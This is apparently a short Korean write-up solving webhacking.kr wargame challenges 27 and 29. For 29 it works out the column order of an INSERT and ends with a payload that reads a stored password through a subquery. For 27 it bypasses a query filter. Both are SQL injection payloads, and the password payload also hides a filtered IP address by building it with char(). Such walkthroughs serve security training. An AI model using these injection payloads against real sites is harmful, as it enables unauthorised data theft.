webhacking.kr 27, 29

27.

select id from challenge27_table where id='guest' and no=($_GET[no])

가 쿼리문.

no=(0) or no like 2-- 

no=(0) or no regexp 2-- 

매직쿼터가 안걸려있으면 no=(0) or id like 'a%'나 id like 'admin' 같은것도 될지 

모르지만 쿼리 에러가 뜨는거보면 매직쿼터가 걸려있나보다.

29.

아무 파일이나 올려보면 내용이 뜨는데 결과값을 보고 쿼리문을 대충 예측해볼수있다.

time, ip, file 3개가 있는것으로 보아 insert into table values(값 3개.)

등으로 예측가능한데 내가 입력한 파일명이 첫번째에 들어가는지 두번째에 들어가는지

3번째에 들어가는지 모르므로 하나하나 예측해서 인젝션을 해보면.

마지막에 들어갈 경우. values('','','')#); 처럼 ')# 를 입력하면 에러가 안 뜰 것이고,

두번째는 ','')#등이겠다. 첫번째에 들어갈경우에는 ','','')# 등인데 이걸 입력하면 에러가 안 뜨는

것으로 보아 내가 입력한 파일 이름은 첫번째위치에 들어간다는걸 알 수 있다.

위치를 알았으니 서브쿼리로 ‘,(select password from c29_tb),내 아이피 주소))# 처럼 하면 되는데

.이 필터링되므로 char로 연결시켜주면된다.

',(select password from c29_tb),char(49,49,57,46,55,48,46,49,53,46,49,48,53))#